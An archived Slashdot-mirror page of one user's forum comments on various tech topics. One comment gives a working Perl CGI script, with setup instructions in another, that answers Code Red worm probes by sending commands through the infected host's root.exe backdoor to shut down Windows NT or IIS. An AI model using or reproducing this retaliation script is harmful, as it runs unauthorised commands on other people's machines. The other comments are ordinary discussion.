Slashdot Mirror


User: Anthony+Kilna

Anthony+Kilna's activity in the archive.

Stories
0
Comments
46

Comments · 46

  1. Re:How do you run these scripts on Code Red: the Aftermath · · Score: 1

    These are meant to be CGI scripts... you need to set up your web server so that any request to http://www.yourserver.com/default.ida runs this code... You can do that by mapping .ida as a CGI extension in your server and naming the file default.ida, or by aliasing /default.ida as /redcode.pl in your server's config. What will then happen is any request for default.ida (which is what the code red virus does) will result in the requestor's machine being hit with a similar request to turn it off/shut down IIS. For this code here, you'll also get an entry in your server's error log so you can know what happened.

  2. Good alternative script on Code Red: the Aftermath · · Score: 1

    #!/usr/bin/perl -w

    # Authored by Anthony Kilna (anthony@kilna.com) Licensed under GPL

    # Change these variables to taste...

    # 1 or 0 depending on whether you'd like to shut down NT entirely or just IIS
    $full_shutdown = 1;

    # 1 or 0 depending on whether you want to spoof a http 404 status code
    $spoof_404 = 1;

    # The location of a file that will be served up (if you're 404-ing this should
    # look like a typical 404 message from your server for the file /default.ida)
    $file = '/www/404.html';

    use LWP::UserAgent;
    use HTTP::Request;

    # Make the HTTP header
    if ($spoof_404) {
        print "Status: 404 Not Found\n";
    }
    print "Content-type: text/html\n\n";

    # Output the file to the browser
    if (open FILE, $file) {
        while (<FILE>) { print $_; }
        close FILE;
    }

    # Makes it so the browser/virus isn't waiting for the outgoing request below
    close STDOUT;

    $server = $ENV{'REMOTE_ADDR'};
    $rooturl = "http://$server/scripts/root.exe";
    $connection = new LWP::UserAgent;
    # Look like we're a real browser (ha!)
    $connection->agent("Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)");

    if ($full_shutdown) {
        # Attempt to shut down NT
        $command = '/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5';
    }
    else {
        # Attempt to shut down IIS
        $command = '/c+iisreset+/stop';
    }

    # Make the request
    $response = $connection->request(new HTTP::Request GET=>"$rooturl?$command");

    # See if it worked, if so report to the web server's log file
    if ($response->is_success) {
        if ($full_shutdown) {
            print STDERR "Code red NT shutdown on $server\n";
        }
        else {
            print STDERR "Code red IIS shutdown on $server\n";
        }
    }

  3. Re:This was inevitable. on Adaptive Optics May Enable Super-Human Vision · · Score: 2

    If you run NT and crash, would it be the "Blue 'Balls of Death"?

  4. Re:Jolt or Mountain Dew in the UK? on Jolt or Mountain Dew in the UK? · · Score: 1

    I am by no means an expert on Canadian law, but I seem to recall reading that the ban was on caffeine in citrus drinks (hence Jolt varieties are OK, but Mountain Dew isn't). Test of theory: Has anyone seen the citrus version of Jolt in Canada?

  5. Re:DDOS trace won't work. on Techie Story On TCP Stacks · · Score: 1

    Another thing that bears mentioning is the fact that DDoS attacks can (and may already be) ack'ed before they arrive... This means only a small amount of requests would have to be issued from a moderate base of compromised systems. Stefan was suggesting that someone wanting to boost performance use HTTP to re-request page chunks that didn't arrive fully, but somehow I don't think the DDoS people really care about receiving the information intact. :)

    I'm not a TCP/IP guru, but would a possible remedy be to vary the length of data being requested, so at least the ability to pre-ack the transfer would be one step harder?

    Tracking back to the attacking hosts at least provides the victim with the ability to deny access relatively local to the attacking machines. Even if the attacking computers are spoofing, if you know a particular machine is being routed through, you can deny access from that router in somewhat of an automatic manner with Stefan's suggestions in place.

  6. Re:No Special Hardware on Make Your Own TiVo? · · Score: 1

    From what I understand of it, the "AV" associated with a drive today means something else. One of the big drive manufacturers (Quantum?) has released technology that allows the drive to both read and write simultaneously... this means you can be watching one show and recording another as long as you're overwriting the old show, or some such.

  7. Stupid Uses... on 101 Keys Soaking Wet: The Flexboard · · Score: 3

    When I become Dr. Evil level rich, I think I will make a pool with a glass window, in which I will put a large screen monitor. Attached to the side of the pool will be this keyboard, and some sort of touchpad mouse. That way I can access the web to look up the rules for "Marco Polo" if there's ever a dispute.

  8. Re:This isn't Outlook's fault on Intel FDIV bug vs ILUVYOU · · Score: 1

    > It's a trojan not a virus.

    It's a trojan AND a virus. A trojan is a program that makes itself out to be something the user wants, lulling them into executing it so that it can carry out its own unauthorized actions (hard drive format, file corruption, even propagation... depends on what the trojan writer's desires are). A virus is a program that replicates itself from host to host, more often than not triggered involuntarily by a user action (usually the cause is the user executing a program that they didn't know contained the virus).

    One could argue that a virus is strictly a program that embeds itself in other executable code for the sake of propagation. The only practical difference between that stricter definition and the one I'm giving here is the fact that the host the virus infects is executable machine code and not a system like the Outlook client and Windows Scripting Host that ILOVEYOU exploited. To me, either way, a system is being exploited for the sake of propagating the offending code.

    ILOVEYOU made itself out to look like something the user wanted and when executed proceeded to replicate itself to other hosts. It has properties of both a Trojan and a Virus.

  9. Re:Things not to when developing a project on Big Ball Of Mud Development Model · · Score: 1

    Microsoft bashing aside, how do we as the technical experts deal with someone without a clue making a decision that heavily influences the effectiveness of a project? My biggest challenge has been finding the most appropriate and professional way to say "That would be stupid". Sometimes there's no option to speak out, indicating that it's time to move on. :)

  10. Re:Lost 30lbs so far on Followup on the Hacker's Diet? · · Score: 1

    I'm also 30 lbs. down, about half way to my goal and I've only been doing this since January. The Hacker's Diet rocks, it really works if you apply it. My doctor said it was a very sensible plan too. The palm software is a great tool for tracking your daily weight... BTW, a great use for the notes section in the software is to write your current calories for the day (that has to be why he added that but gave you so little space).

  11. Re:Nice, but they don't have much of a chance. on Microsoft Pits Pocket PC Against Palm · · Score: 1

    There's a little system extension called "MenuHack" which allows you to click on the title bar of the app (if it has one) to bring up the menu. That's the only metaphor from the windows interface that frustrated me when working with PalmOS, and it took me no time flat to find a fix for it. Check your local PalmOS shareware site!

  12. Re:There's a deceptive line or two in their releas on Microsoft Pits Pocket PC Against Palm · · Score: 1

    You say this as if browsing the web in 240x320 is all that much better? Let's face it, any palm-sized platform is going to be unsuitable for browsing the web in any real sense. And no matter how high we drive the resolution, the only thing that will do is make the text crisper, not allow us to put more text on the screen. A two or three inch square just isn't big enough. Would you think it's practical to read a newspaper if it was delivered in paperback format?

    Clarity of the image is the most important factor in choosing a device. Resolution helps, but other factors are just as important... like brightness and sharpness of an image. In all fairness, anyone who's seen it says the Palm IIIc beats all of the competition hands down in those categories.

  13. Re:laptop without screen and battery - bright idea on Super Tiny Espresso PC · · Score: 1

    So instead of a perv playing with his twiddler, you're now staring blankly talking to nobody. I suppose at least the latter doesn't get you arrested...

  14. Re:E-Holster on Laptop Carrying Gear? · · Score: 1

    I love my e-holster. Get one. Now. No really, you won't look like a geek in it. Well, actually you will, but you won't care because the e-holster is so cool. Get one. Now.

  15. Re:Scripting, etc... on GPL/LGPL Issues - Moving GPL'd Code into Libs? · · Score: 1

    Actually, IIRC there is a perl compiler out there... Regardless, whether the source is available or not is not the question, though it is part of the functional purpose of that which is in question, the licence. GPL doesn't only mean "source has to be included", it also means you have to include due credit to the original author, and of course redistribute the license file as well, among other things. :)

  16. Re:Useless for SSL on Wildcard DNS, Session Management And Prior Art · · Score: 1

    Thawte's search function is down right now, but I distinctly remember reading in one of their docs about several web client/server combinations that had problems handling wildcard certificates. And no e-commerce vendor wants to limit their audience.

  17. Flamebait on Linux for Win32 Development? · · Score: 2

    (Placing tongue firmly in cheek)

    Just use Java! :)


  18. Re:Diet Mountain Dew? Ugh! on The Ultimate Geek Food · · Score: 1

    I'll admit, it took me about a week to get acclimated to the taste of saccharin/nutrasweet. But once you have reached the threshold of tolerance for the taste of artificial sweeteners, it's not a bad drink. Considering the fact that I go through the better part of a six-pack a day sometimes, it became an absolute necessity to go diet on the sodas if I wanted to lose weight.

  19. Hacker's Diet on The Ultimate Geek Food · · Score: 2

    This sounds like the perfect food for the Hacker's Diet. It looks like a lot of volume for the calorie count, and has quite a bit of nutritional value as well.

    I do have to agree that this looks more like Yuppie Chow (tm) than geek food. I just don't see engineers eating a lot of legumes and non-dairy cheese. It is, however, a microwavable food... and there is a certain charm to foods you've just prepared by exposing them to radiation.

    Now if Mr. Adams can hook up with Pepsico to make a healthy Dorito with 100% of my daily nutritional needs, to go along with my DMD (Diet Mountain Dew, a gift from above to dieting hackers)... Then he's really got something.

    I'll try it, and if it's good I'll continue buying it. But I don't really know if it's wise for ol' Scott to use the Dilbert name everywhere. Especially on something whose concept it doesn't mesh with, like yuppie health food. We don't want Dilbert to become so ever present that we get tired of it.

  20. Re:Lower-case / capital letters for filenames on FreeBSD VM Design · · Score: 1

    There are 3 ways to do file systems (I've used all 3):

    Case Forgetting

    Like DOS, you can type the filename however you want (oscillating CAPS LOCK if you like), but it's always gonna show up as uppercase in a DIR.

    Case Preserving/Case Sensitive

    Like UNIX, which means you can create the BAD situation of a file name that's the same except for capitalization. Why the hell would one WANT this? Filenames are supposed to provide context about the file's contents, and this does NOT serve that purpose.

    Case Preserving/Case Insensitive

    Like NT and 9x... sort of. I've noticed that on FAT filesystems, Windows will assume that you want filenames that fit 8.3 to be displayed with an uppercase first letter and all lower after that. Annoying. But (true) Case Preserving/Case Insensitive file systems make the most sense to me: you don't have to worry if you're opening "README" or "readme", it just works. This is probably my biggest beef with using UNIX-based systems!

  21. Re:Intel and AMD also emulate the instruction set on UPDATED: Transmeta's Crusoe Unveiled · · Score: 1

    I think a good point is being made here: it probably won't matter much that we have two layers of translation (Java bytecode -> x86, x86 -> TM VLIW) because of the built-in self optimizing nature of the TM processor. In fact, I imagine TM will be the best PC platform for running any sort of instruction set translation because of its "smart" self-teaching method of translating. I'll bet something like the PlayStation emulator will rock on their hardware.

  22. Re:What's wrong with Transmeta on UPDATED: Transmeta's Crusoe Unveiled · · Score: 1

    Of course you then update the code morphing software in your flash ROM to support IA-64. :) In reality of course, there will be significant differences in how x86 and IA-64 (Itanium... UGH) communicate with memory and peripheral busses, so it'll probably not be as easy as that. But if Intel unleashes something like an updated MMX instruction set, there's no reason the TM processor couldn't be software upgraded to handle those instructions.

  23. Re:Could we please get an EPOC version? on The Hacker's Diet Revisited · · Score: 1

    And a version for the vTech Helio would be cool too! :) Brand new SDK with sparse apps available so far (wide open territory)

  24. Off Topic... on Software Version Numbering After 2000? · · Score: 1

    Whatever happened to Battle Chess?

  25. Re:Version numbers based on years sometimes *good* on Software Version Numbering After 2000? · · Score: 1

    I agree with you. The way I see it, all things being equal, traditional versioning and year-based versioning will both tell you what product is newer than another (assuming the same system has always been in place, i.e., there's no way to tell if Windows 3.1 or Windows 2000 is a newer product).

    The year-based numbering system does have two advantages: It's more user friendly (my mom will comprehend and feel better about a version number she can associate with a real world concept like years), and it gives the user (experienced or not) a concept of when the software was released. Yes, the marketroids like it, but that doesn't mean it's a useless concept.

    The things that concern me though: A major revision development cycle less than one year. Red Hat 2000 1/2 anyone? And an intuitive standard for minor revisions... MS has switched from OSRx to x-th Edition on the Windows line, and uses Service Pack x on their other products. I kinda like the idea of Product 2000 Update x Patch y, which would translate well into standard version numbers (2000.x.y).